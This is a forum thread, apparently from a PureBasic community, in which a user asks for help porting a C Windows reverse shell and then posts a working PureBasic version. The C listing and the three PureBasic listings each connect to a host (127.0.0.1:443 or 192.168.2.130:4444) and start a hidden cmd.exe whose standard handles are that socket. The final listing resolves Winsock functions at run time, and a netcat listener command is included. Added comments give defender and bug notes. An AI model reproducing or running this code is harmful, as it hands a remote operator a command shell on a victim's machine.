[Solved] Redirect IO of process to socket

xakep

[Solved] Redirect IO of process to socket

Post by xakep »

I am basically trying to make a cmd.exe reverse shell "via" a netcat client.

I am trying to convert this C++ code: @ http://sh3llc0d3r.com/windows-reverse-s ... ellcode-i/


#include "stdafx.h"

#define _WINSOCK_DEPRECATED_NO_WARNINGS

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "Ws2_32.lib")


//int _tmain(int argc, _TCHAR* argv[])
// Thread's C++ reference: connect a TCP socket to 127.0.0.1:443 and start
// cmd.exe with stdin/stdout/stderr all set to that socket (the reverse shell
// the thread is about). The socket reaches the child only because
// bInheritHandles is TRUE in CreateProcess.
// Defender view: the observable is an outbound connect from this process
// followed by a cmd.exe child whose standard handles are the socket; endpoint
// telemetry that correlates process-creation and network-connection events by
// parent PID is what commonly catches this, and egress filtering of the chosen
// port blocks the connect.
// Correctness notes on the listing as given: no return value is checked,
// ip_addr is never used, the PROCESS_INFORMATION handles are never closed,
// and WinMain is declared int but has no return statement.
int WinMain(
  _In_ HINSTANCE hInstance,
  _In_ HINSTANCE hPrevInstance,
  _In_ LPSTR     lpCmdLine,
  _In_ int       nCmdShow
)

{

	WSADATA wsaData;
SOCKET s1;
struct sockaddr_in hax;      // only three fields are set below; sin_zero stays uninitialised
char ip_addr[16];            // declared but never used
STARTUPINFO sui;
PROCESS_INFORMATION pi;

	WSAStartup(MAKEWORD(2, 2), &wsaData);   // Winsock 2.2; result ignored
	s1 = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);   // group 0, flags 0; INVALID_SOCKET not checked

	hax.sin_family = AF_INET;
	hax.sin_port = htons(443);                       // hard-coded port
	hax.sin_addr.s_addr = inet_addr("127.0.0.1");   // hard-coded loopback address

	WSAConnect(s1, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);   // SOCKET_ERROR not checked

	memset(&sui, 0, sizeof(sui));
	sui.cb = sizeof(sui);
	sui.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);   // honour hStd* below; wShowWindow is 0 (SW_HIDE) from the memset
	sui.hStdInput = sui.hStdOutput = sui.hStdError = (HANDLE) s1;  // a SOCKET is a kernel handle, so one value serves all three std handles

	TCHAR commandLine[256] = L"cmd.exe";   // writable buffer: the Unicode CreateProcess may modify lpCommandLine
	CreateProcess(NULL, commandLine, NULL, NULL, TRUE, 0, NULL, NULL, &sui, &pi);   // TRUE = inherit handles (the socket); result and pi handles ignored
}
What I have so far:


EnableExplicit

; Hand-declared Winsock structures (this first attempt does not use
; PureBasic's built-in sockaddr_in). in_addr is the 4-byte IPv4 address.
Structure in_addr
  s_addr.l
EndStructure

; sockaddr_in with C alignment: 2 + 2 + 4 + 8 = 16 bytes.
Structure SOCKADDR_IN_ Align #PB_Structure_AlignC
  sin_family.w
  sin_port.w
  sin_addr.in_addr
  sin_zero.a[8]
EndStructure

; WSAConnect is linked statically here; inet_addr is looked up at run time (see ResolveFunc).
Import "WS2_32.LIB"
  WSAConnect(SOCKET.i, *sockaddr, namelen.i, *lpCallerData, *lpCalleeData, *lpSQOS, *lpGQOS)
EndImport

#SD_BOTH = 2             ; shutdown(): disable both send and receive
#SOCKET_VERSION_2 = 514  ; $0202 = Winsock 2.2 (not used in this listing)
#SOCKET_VERSION_1 = $101 ; Winsock 1.1, the version Go() requests

;WS2_32.dll
; Module handle and resolved address of inet_addr, filled by Ws2_32_Init().
; Both are .l (32-bit) — assumes a 32-bit build; confirm before reuse on x64.
Global Ws2_32_DLL.l
Global inet_addr.l

Prototype W_inet_addr(*IP) ; call signature for the inet_addr pointer above
;WS2_32.dll

; Looks up an export of an already-loaded module by name.
; In:  lDll       - module handle (from LoadLibrary_)
;      lpProcName - export name; converted to an ASCII buffer for GetProcAddress_
; Out: the export's address, or 0 when the name is shorter than 3 bytes, the
;      buffer cannot be allocated, or GetProcAddress_ fails. When lDll is 0 the
;      procedure falls off the end with no ProcedureReturn (presumably 0 — confirm).
; Analyst note: resolving Winsock exports this way keeps their names out of the
; executable's import table; they remain as plain string literals in the binary.
Procedure ResolveFunc(lDll.l, lpProcName.s)
  Define ProfileLen, *ProfileNow, lRet.l
  
  If lDll
    ProfileLen = StringByteLength(lpProcName, #PB_Ascii)   ; byte length of the ASCII form, without terminator
    
    If ProfileLen > 2
      *ProfileNow = AllocateMemory(ProfileLen + SizeOf(Character))   ; extra room for the NUL terminator
      
      If *ProfileNow
        
        ; Only call GetProcAddress_ when the whole name was written as ASCII.
        If PokeS(*ProfileNow, lpProcName, -1, #PB_Ascii) = ProfileLen
          lRet = GetProcAddress_(lDll, *ProfileNow)
        EndIf
      
        FreeMemory(*ProfileNow)
      EndIf
    EndIf
    
    ProfileLen = 0   ; dead store; lRet is the only value that matters from here
    ProcedureReturn lRet
  EndIf
EndProcedure

; Loads Ws2_32.dll once (never freed) and resolves inet_addr through
; ResolveFunc(). Returns #True only when both the module handle and the
; function pointer are non-zero; safe to call repeatedly.
Procedure Ws2_32_Init()
  
  If Ws2_32_DLL = #False
    Ws2_32_DLL = LoadLibrary_("Ws2_32.dll")   ; loaded by name; no FreeLibrary_ anywhere in the listing
  EndIf
  
  If Ws2_32_DLL <> #False
    
    If inet_addr = #False
      inet_addr = ResolveFunc(Ws2_32_DLL, "inet_addr")
    EndIf
    
    If inet_addr <> #False
      ProcedureReturn #True
    Else
      ProcedureReturn #False
    EndIf
    
  Else
    ProcedureReturn #False
  EndIf
  
EndProcedure

; Calls the run-time-resolved inet_addr through the W_inet_addr prototype.
; In:  *IP - pointer to a NUL-terminated ASCII dotted-quad string
; Out: the IPv4 address in network byte order, INADDR_NONE on a bad string
;      (inet_addr's own contract). When inet_addr was never resolved there is
;      no ProcedureReturn — presumably yields 0; confirm.
Procedure Ws2_inet_addr(*IP)
  Define Ws2.W_inet_addr
  
  If inet_addr
    Ws2.W_inet_addr = inet_addr   ; bind the raw address to the typed prototype
    
    ProcedureReturn Ws2(*IP)
  EndIf
  
EndProcedure

; First attempt: connect to RemoteIP:RemotePort and start cmd.exe with its
; standard handles redirected to the socket (the reverse shell the thread
; describes). Flow: lazy Ws2_32_Init(), WSAStartup (Winsock 1.1), WSASocket,
; inet_addr on an ASCII copy of RemoteIP, WSAConnect with one retry after
; 500 ms on refused/unreachable/timeout, CreateProcess, then
; shutdown/closesocket/WSACleanup.
; Known problems in this version (the thread's later post addresses them):
;  - hStdInput/Output/Error receive @hSocket, the address of the local
;    variable, not the socket handle itself.
;  - PokeS(*IP, RemoteIP, 14, ...) = 14 only holds for a 14-character address
;    string (presumably PokeS returns the number of bytes written — confirm),
;    so "127.0.0.1" never reaches the connect.
;  - hConnect starts at 0 = #S_OK, so shutdown_() also runs on paths that
;    never connected.
; Defender view: the observable is an outbound TCP connect from this process
; immediately followed by a cmd.exe child inheriting the socket as its std
; handles; that parent/child + network pairing is what endpoint telemetry
; rules commonly key on, and egress filtering of the port blocks the connect.
Procedure Go(RemoteIP.s, RemotePort.l)
  Define wData.WSADATA, hSocket.l, sVers.w, hConnect.l, eNow.l, *send, Send.SOCKADDR_IN_, *IP, longIp.l, sui.STARTUPINFO, pi.PROCESS_INFORMATION
  Define h1.l   ; sVers, *send and h1 are declared but never used
  
  If Ws2_32_DLL = #False
    If Ws2_32_Init() = #False
      ProcedureReturn   ; inet_addr could not be resolved; nothing below is usable
    EndIf
  EndIf

  If WSAStartup_(#SOCKET_VERSION_1, @wData) = #S_OK   ; requests Winsock 1.1 although WSAConnect is a Winsock 2 call

    hSocket = WSASocket_(#AF_INET, #SOCK_STREAM, #IPPROTO_TCP, #Null, 0, 0)   ; PureBasic's own import; kept in a 32-bit .l (assumes a 32-bit build)
    
    If hSocket <> #INVALID_SOCKET
      
      *IP = AllocateMemory(16)   ; ASCII copy of RemoteIP for inet_addr (longest dotted quad is 15 chars + NUL)
      
      If *IP And PokeS(*IP, RemoteIP, 14, #PB_Ascii) = 14   ; see header: only true for a 14-character string
        
        longIp = Ws2_inet_addr(*IP)
        
        If longIp <> #INADDR_NONE And longIp <> #INADDR_ANY   ; reject unparsable input and 0.0.0.0
          Send\sin_family = #AF_INET
          Send\sin_addr\s_addr = longIp   ; already network byte order from inet_addr
          Send\sin_port = htons_(RemotePort)
          
          hConnect = WSAConnect(hSocket, @Send, SizeOf(SOCKADDR_IN_), #NUL, #NUL, #NUL, #NUL)
          
          If hConnect = #SOCKET_ERROR
            eNow = WSAGetLastError_()
            Debug "eNow:" + eNow
            
            ; Single retry after 500 ms for the three transient failures.
            If eNow = #WSAECONNREFUSED Or eNow = #WSAENETUNREACH Or eNow = #WSAETIMEDOUT
              Sleep_(500)
              hConnect = WSAConnect(hSocket, @Send, SizeOf(SOCKADDR), #NUL, #NUL, #NUL, #NUL)   ; SizeOf(SOCKADDR) here vs SizeOf(SOCKADDR_IN_) above; both are 16 bytes
            EndIf
          EndIf
          
          If hConnect = #S_OK   ; WSAConnect returns 0 on success
            Debug "hConnect:" + hConnect
            
            ZeroMemory_(@sui, SizeOf(STARTUPINFO))
            sui\cb = SizeOf(sui)
            sui\dwFlags = #STARTF_USESTDHANDLES | #STARTF_USESHOWWINDOW   ; wShowWindow stays 0 from ZeroMemory_
            
            ; BUG (as the thread concludes): @hSocket is a pointer to the variable, not the handle value.
            sui\hStdInput = @hSocket
            sui\hStdOutput = @hSocket
            sui\hStdError = @hSocket
            
            Debug "CreateProcess:" + CreateProcess_(#Null, "cmd.exe", #Null, #Null, #True, 0, #Null, #Null, @sui, @pi)   ; #True = inherit handles; pi handles never closed

          EndIf
          
        EndIf
        FreeMemory(*IP)
      EndIf
    
      If hConnect = #S_OK
        shutdown_(hSocket, #SD_BOTH)   ; tears down the connection the child shares — presumably ends its I/O; the final version omits this
      EndIf
      closesocket_(hSocket)
    EndIf
    
    WSACleanup_()
  EndIf
  
EndProcedure

Go("127.0.0.1", 443) ; entry point: loopback target and port 443, as in the C listing
The problem is this line; I'm not sure how to convert it to PureBasic:
sui.hStdInput = sui.hStdOutput = sui.hStdError = (HANDLE) s1;

To test it, run netcat like this:
nc -l -p 443 -vv

Any help is appreciated, thanks for reading this topic )
Last edited by xakep on Sat Jul 15, 2017 8:46 pm, edited 1 time in total.
xakep

Re: Redirect IO of process to socket

Post by xakep »

It seems no one wants to help me with this (
CELTIC88

Re: Redirect IO of process to socket

Post by CELTIC88 »


; #include "stdafx.h"
; 
; #define _WINSOCK_DEPRECATED_NO_WARNINGS
; 
; #include <winsock2.h>
; #include <stdio.h>
; 
; #pragma comment(lib,"ws2_32")
; CELTIC88's line-by-line transcription of the C listing above; the original
; C statement is kept after each PureBasic line as a ';' comment. Note that
; the address and port were changed to 192.168.2.130:4444 while the trailing
; C comments still show 127.0.0.1:443. Winsock is reached through
; OpenLibrary/GetFunction pointers (WSAStartup, WSAConnect, WSASocketW),
; inet_addr through a static Import, memset through the CRT Import "".
; No return value is checked anywhere in this listing, and nothing is closed.
 Prototype WSAStartup(wVersionRequested.w,
             *lpWSAData)
 Prototype WSAConnect(SOCKET.i,
             *name,
             namelen.l,
             *lpCallerData,
             *lpCalleeData,
             *lpSQOS,
             *lpGQOS)
 Prototype WSASocket( af.l,
             type.l,
             protocol.l,
             *lpProtocolInfo,
             g.l,;GROUP = DWORD
             dwFlags.l)

OpenLibrary(0,"Ws2_32") ; library handle and the three GetFunction() results below are not checked
WSAStartup.WSAStartup=GetFunction(0,"WSAStartup")
WSAConnect.WSAConnect=GetFunction(0,"WSAConnect")
WSASocket.WSASocket=GetFunction(0,"WSASocketW") ; wide-char variant of WSASocket

Import "Ws2_32.lib"
  inet_addr.l(s.p-ascii) ; p-ascii: PureBasic hands the string to the call as ASCII
EndImport

Import ""
  memset(p,v.l,size.l) ; from the C runtime linked into the executable
EndImport


wsaData.WSADATA;WSADATA wsaData;
s1.i;SOCKET s1;
hax.sockaddr_in ;struct sockaddr_in hax; (PureBasic's built-in structure)
ip_addr.s{16};char ip_addr[16]; (declared, never used)
sui.STARTUPINFO ;STARTUPINFO sui;
pi.PROCESS_INFORMATION ;PROCESS_INFORMATION pi;

; Builds the Winsock version word: MAKEWORD(2, 2) = $0202 (Winsock 2.2).
Macro MAKEWORD(iLo, iHi)
  ((iHi<<8)| (iLo& $FF))
EndMacro

; int _tmain(int argc, _TCHAR* argv[])
; {
WSAStartup(MAKEWORD(2, 2), @wsaData);WSAStartup(MAKEWORD(2, 2), &wsaData);

s1 = WSASocket(#AF_INET, #SOCK_STREAM, #IPPROTO_TCP, #Null,
               #Null, #Null);s1 = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL,unsigned int)NULL, (unsigned int)NULL); (group 0, flags 0)

	hax\sin_family = #AF_INET;hax.sin_family = AF_INET;
	hax\sin_port = htons_(4444);hax.sin_port = htons(443); (port changed to 4444 in the PureBasic version)
	hax\sin_addr = inet_addr("192.168.2.130");hax.sin_addr.s_addr = inet_addr("127.0.0.1"); (address changed in the PureBasic version)

	WSAConnect(s1, @hax, SizeOf(hax), #Null, #Null, #Null, #Null);WSAConnect(s1, (SOCKADDR*)&hax, SizeOf(hax), NULL, NULL, NULL, NULL); (SOCKET_ERROR not checked)

	memset(@sui, 0, SizeOf(sui));memset(&sui, 0, SizeOf(sui));
	sui\cb = SizeOf(sui);sui.cb = SizeOf(sui);
	sui\dwFlags = (#STARTF_USESTDHANDLES | #STARTF_USESHOWWINDOW);sui.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
	sui\hStdInput =  s1:sui\hStdOutput = s1:sui\hStdError =  s1;sui.hStdInput = sui.hStdOutput = sui.hStdError = (HANDLE) s1; -- the handle value itself, which is what the question was about

	 commandLine.s{256} = "cmd.exe";TCHAR commandLine[256] = L"cmd.exe";
	CreateProcess_(#Null, commandLine, #Null, #Null, #True,
	    0, #Null, #Null, @sui, @pi);	CreateProcess(NULL, commandLine, NULL, NULL, TRUE,0, NULL, NULL, &sui, &pi); (#True = the child inherits the socket; pi handles never closed)
; }
interested in Cybersecurity..
xakep

Re: Redirect IO of process to socket

Post by xakep »

@CELTIC88 Thanks for your time and help.

Here is "my" final code:


EnableExplicit

;WS2_32.dll
; Module handle and run-time-resolved Winsock function addresses, filled by
; Ws2_32_Init(). All are .l (32-bit) — assumes a 32-bit build; confirm on x64.
; Analyst note: none of these names are in the executable's import table;
; they stay as plain string literals and are resolved with GetProcAddress_.
Global Ws2_32_DLL.l
Global inet_addr.l
Global WSAStartup.l
Global WSAConnect.l
Global WSASocket.l
Global htons.l
Global WSAGetLastError.l

; Call signatures used to invoke the raw addresses above (see the Ws2_* wrappers).
Prototype W_inet_addr(*IP)
Prototype W_WSAStartup(wVersionRequested.w, *lpWSAData)
Prototype W_WSAConnect(SOCKET.i, *name, namelen.l, *lpCallerData, *lpCalleeData, *lpSQOS, *lpGQOS)
Prototype W_WSASocket(af.l, type.l, protocol.l, *lpProtocolInfo, g.l, dwFlags.l)
Prototype W_htons(hostshort.l)
Prototype No_Params()
;WS2_32.dll

#SOCKET_VERSION_2 = 514 ; $0202 = Winsock 2.2, passed to WSAStartup

; Looks up an export of an already-loaded module by name.
; In:  lDll       - module handle (from LoadLibrary_)
;      lpProcName - export name; converted to an ASCII buffer for GetProcAddress_
; Out: the export's address, or 0 when the name is shorter than 3 bytes, the
;      buffer cannot be allocated, or GetProcAddress_ fails. When lDll is 0 the
;      procedure falls off the end with no ProcedureReturn (presumably 0 — confirm).
; Analyst note: resolving Winsock exports this way keeps their names out of the
; executable's import table; they remain as plain string literals in the binary.
Procedure ResolveFunc(lDll.l, lpProcName.s)
  Define ProfileLen, *ProfileNow, lRet.l
 
  If lDll
    ProfileLen = StringByteLength(lpProcName, #PB_Ascii)   ; byte length of the ASCII form, without terminator
   
    If ProfileLen > 2
      *ProfileNow = AllocateMemory(ProfileLen + SizeOf(Character))   ; extra room for the NUL terminator
     
      If *ProfileNow
       
        ; Only call GetProcAddress_ when the whole name was written as ASCII.
        If PokeS(*ProfileNow, lpProcName, -1, #PB_Ascii) = ProfileLen
          lRet = GetProcAddress_(lDll, *ProfileNow)
        EndIf
     
        FreeMemory(*ProfileNow)
      EndIf
    EndIf
   
    ProfileLen = 0   ; dead store; lRet is the only value that matters from here
    ProcedureReturn lRet
  EndIf
EndProcedure

; Loads Ws2_32.dll once (never freed) and resolves the six Winsock exports
; used by Go() through ResolveFunc() into the global function pointers.
; Returns #True only when the module handle and all six pointers are
; non-zero. Each lookup is skipped once done, so repeated calls are cheap.
Procedure Ws2_32_Init()
 
  If Ws2_32_DLL = #False
    Ws2_32_DLL = LoadLibrary_("Ws2_32.dll")   ; loaded by name; no FreeLibrary_ anywhere in the listing
  EndIf
 
  If Ws2_32_DLL <> #False
   
    If inet_addr = #False
      inet_addr = ResolveFunc(Ws2_32_DLL, "inet_addr")
    EndIf
    
    If WSAStartup = #False
      WSAStartup = ResolveFunc(Ws2_32_DLL, "WSAStartup")
    EndIf
    
    If WSAConnect = #False
      WSAConnect = ResolveFunc(Ws2_32_DLL, "WSAConnect")
    EndIf
    
    If WSASocket = #False
      WSASocket = ResolveFunc(Ws2_32_DLL, "WSASocketW")   ; wide-char variant; the W_WSASocket prototype matches its argument list
    EndIf
    
    If htons = #False
      htons = ResolveFunc(Ws2_32_DLL, "htons")
    EndIf
    
    If WSAGetLastError = #False
      WSAGetLastError = ResolveFunc(Ws2_32_DLL, "WSAGetLastError")
    EndIf
    
    ; All-or-nothing: a single unresolved export makes Go() bail out.
    If inet_addr <> #False And WSAStartup <> #False And WSAConnect <> #False And WSASocket <> #False And htons <> #False And WSAGetLastError <> #False
      ProcedureReturn #True
    Else
      ProcedureReturn #False
    EndIf
   
  Else
    ProcedureReturn #False
  EndIf
 
EndProcedure

; Calls the run-time-resolved WSAGetLastError through the No_Params prototype.
; Out: the calling thread's last Winsock error code. When the pointer was
;      never resolved there is no ProcedureReturn — presumably yields 0; confirm.
Procedure Ws2_WSAGetLastError()
  Define Ws2.No_Params
  
  If WSAGetLastError
    Ws2.No_Params = WSAGetLastError   ; bind the raw address to the typed prototype
    
    ProcedureReturn Ws2()
  EndIf
  
EndProcedure

; Calls the run-time-resolved htons through the W_htons prototype.
; In:  hostshort.l - port number in host byte order (declared .l here although
;      htons takes a 16-bit u_short; presumably only the low 16 bits are used — confirm)
; Out: the port in network byte order. When the pointer was never resolved
;      there is no ProcedureReturn — presumably yields 0; confirm.
Procedure Ws2_htons(hostshort.l)
  Define Ws2.W_htons
  
  If htons
    Ws2.W_htons = htons   ; bind the raw address to the typed prototype
    
    ProcedureReturn Ws2(hostshort)
  EndIf
  
EndProcedure

; Forwards the six WSASocket arguments to the run-time-resolved WSASocketW
; through the W_WSASocket prototype.
; Out: the new socket handle (or INVALID_SOCKET, per WSASocket's contract).
;      When the pointer was never resolved there is no ProcedureReturn —
;      presumably yields 0; confirm.
Procedure Ws2_WSASocket(af.l, type.l, protocol.l, *lpProtocolInfo, g.l, dwFlags.l)
  Define Ws2.W_WSASocket
  
  If WSASocket
    Ws2.W_WSASocket = WSASocket   ; bind the raw address to the typed prototype
    
    ; The type suffixes in this call just re-state the parameters' types.
    ProcedureReturn Ws2(af.l, type.l, protocol.l, *lpProtocolInfo, g.l, dwFlags.l)
  EndIf
  
EndProcedure

; Forwards the seven WSAConnect arguments to the run-time-resolved WSAConnect
; through the W_WSAConnect prototype.
; Out: 0 on success or SOCKET_ERROR (WSAConnect's contract). When the pointer
;      was never resolved there is no ProcedureReturn — presumably yields 0; confirm.
Procedure Ws2_WSAConnect(SOCKET.i, *name, namelen.l, *lpCallerData, *lpCalleeData, *lpSQOS, *lpGQOS)
  Define Ws2.W_WSAConnect
  
  If WSAConnect
    Ws2.W_WSAConnect = WSAConnect   ; bind the raw address to the typed prototype
    
    ProcedureReturn Ws2(SOCKET, *name, namelen, *lpCallerData, *lpCalleeData, *lpSQOS, *lpGQOS)
  EndIf
  
EndProcedure

; Calls the run-time-resolved WSAStartup through the W_WSAStartup prototype.
; In:  wVersionRequested.i - declared .i here but .w in the prototype; the
;      caller passes $0202, so presumably the low 16 bits are what arrive — confirm
;      *lpWSAData         - receives the WSADATA
; Out: 0 on success (WSAStartup's contract). When the pointer was never
;      resolved there is no ProcedureReturn — presumably yields 0; confirm.
Procedure Ws2_WSAStartup(wVersionRequested.i, *lpWSAData)
  Define Ws2.W_WSAStartup
  
  If WSAStartup
    Ws2.W_WSAStartup = WSAStartup   ; bind the raw address to the typed prototype
    
    ProcedureReturn Ws2(wVersionRequested, *lpWSAData)
  EndIf
  
EndProcedure

; Calls the run-time-resolved inet_addr through the W_inet_addr prototype.
; In:  *IP - pointer to a NUL-terminated ASCII dotted-quad string
; Out: the IPv4 address in network byte order, INADDR_NONE on a bad string
;      (inet_addr's own contract). When inet_addr was never resolved there is
;      no ProcedureReturn — presumably yields 0; confirm.
Procedure Ws2_inet_addr(*IP)
  Define Ws2.W_inet_addr
 
  If inet_addr
    Ws2.W_inet_addr = inet_addr   ; bind the raw address to the typed prototype
   
    ProcedureReturn Ws2(*IP)
  EndIf
 
EndProcedure

; Final version: connect to RemoteIP:RemotePort and start cmd.exe with its
; standard handles bound to the socket (the reverse shell the thread is
; about). Flow: lazy Ws2_32_Init(), WSAStartup (Winsock 2.2), WSASocketW,
; inet_addr on an exact-length ASCII copy of RemoteIP, WSAConnect with one
; retry after 500 ms on refused/unreachable/timeout, then CreateProcess with
; handle inheritance. Changes from the first attempt: the handle value (not
; @hSocket) goes into hStd*, the PokeS check uses the real string length,
; every Winsock call goes through a Ws2_* wrapper, and the socket is no
; longer shut down/closed after the child starts.
; Left as-is: the CreateProcess_ result and the pi handles are ignored, and
; there is no closesocket_/WSACleanup_ on any path.
; Defender view: an outbound TCP connect from this process immediately
; followed by a cmd.exe child inheriting the socket as stdin/stdout/stderr is
; the parent/child + network pairing endpoint telemetry rules commonly key
; on; egress filtering of the target port blocks the connect.
Procedure Go(RemoteIP.s, RemotePort.l)
  Define *IP, longIp.l, wsaData.WSADATA, hSocket.i, hax.sockaddr_in, sui.STARTUPINFO, pi.PROCESS_INFORMATION, commandLine.s{256}, hConnect.l, eNow.l, iLen.l

  If Ws2_32_DLL = #False
    If Ws2_32_Init() = #False
      ProcedureReturn   ; at least one of the six Winsock exports did not resolve
    EndIf
  EndIf
  
  If Ws2_WSAStartup(#SOCKET_VERSION_2, @wsaData) = #S_OK   ; Winsock 2.2; 0 = success

    hSocket = Ws2_WSASocket(#AF_INET, #SOCK_STREAM, #IPPROTO_TCP, #Null, #Null, #Null)   ; group 0, dwFlags 0
    
    If hSocket <> #INVALID_SOCKET
      
      ; Exact-length ASCII copy of RemoteIP for inet_addr (the first attempt hard-coded 14).
      iLen = StringByteLength(RemoteIP, #PB_Ascii)
      *IP = AllocateMemory(iLen + SizeOf(Character))
      
      If *IP And PokeS(*IP, RemoteIP, -1, #PB_Ascii) = iLen
        
        longIp = Ws2_inet_addr(*IP)
        
        If longIp <> #INADDR_NONE And longIp <> #INADDR_ANY   ; reject unparsable input and 0.0.0.0
          
          hax\sin_family = #AF_INET
          hax\sin_port = Ws2_htons(RemotePort)
          hax\sin_addr = longIp    ; already network byte order from inet_addr
      
          hConnect = Ws2_WSAConnect(hSocket, @hax, SizeOf(hax), #Null, #Null, #Null, #Null)
          
          If hConnect = #SOCKET_ERROR
            eNow = Ws2_WSAGetLastError()
            Debug "eNow:" + eNow
           
            ; Single retry after 500 ms for the three transient failures.
            If eNow = #WSAECONNREFUSED Or eNow = #WSAENETUNREACH Or eNow = #WSAETIMEDOUT
              Sleep_(500)
              hConnect = Ws2_WSAConnect(hSocket, @hax, SizeOf(hax), #Null, #Null, #Null, #Null)
            EndIf
          EndIf
          
          If hConnect = #S_OK   ; WSAConnect returns 0 on success
            
            ZeroMemory_(@sui, SizeOf(STARTUPINFO))

            sui\cb = SizeOf(sui)
            sui\dwFlags = (#STARTF_USESTDHANDLES | #STARTF_USESHOWWINDOW)   ; wShowWindow stays 0 from ZeroMemory_
            ; The socket handle value itself goes into all three std handles (the line the thread was stuck on).
            sui\hStdInput = hSocket:sui\hStdOutput = hSocket:sui\hStdError = hSocket
        
             commandLine = "cmd.exe"
             CreateProcess_(#Null, commandLine, #Null, #Null, #True, 0, #Null, #Null, @sui, @pi)   ; #True = inherit handles; result and pi handles ignored
           EndIf
         EndIf
         FreeMemory(*IP)
       EndIf
    EndIf
  
  EndIf 
EndProcedure


 Go("192.168.2.130", 4444) ; entry point: same address and port as CELTIC88's listing
It seems my problem was with this line:


sui\hStdInput = hSocket:sui\hStdOutput = hSocket:sui\hStdError = hSocket
I didn't know this was possible in PureBasic )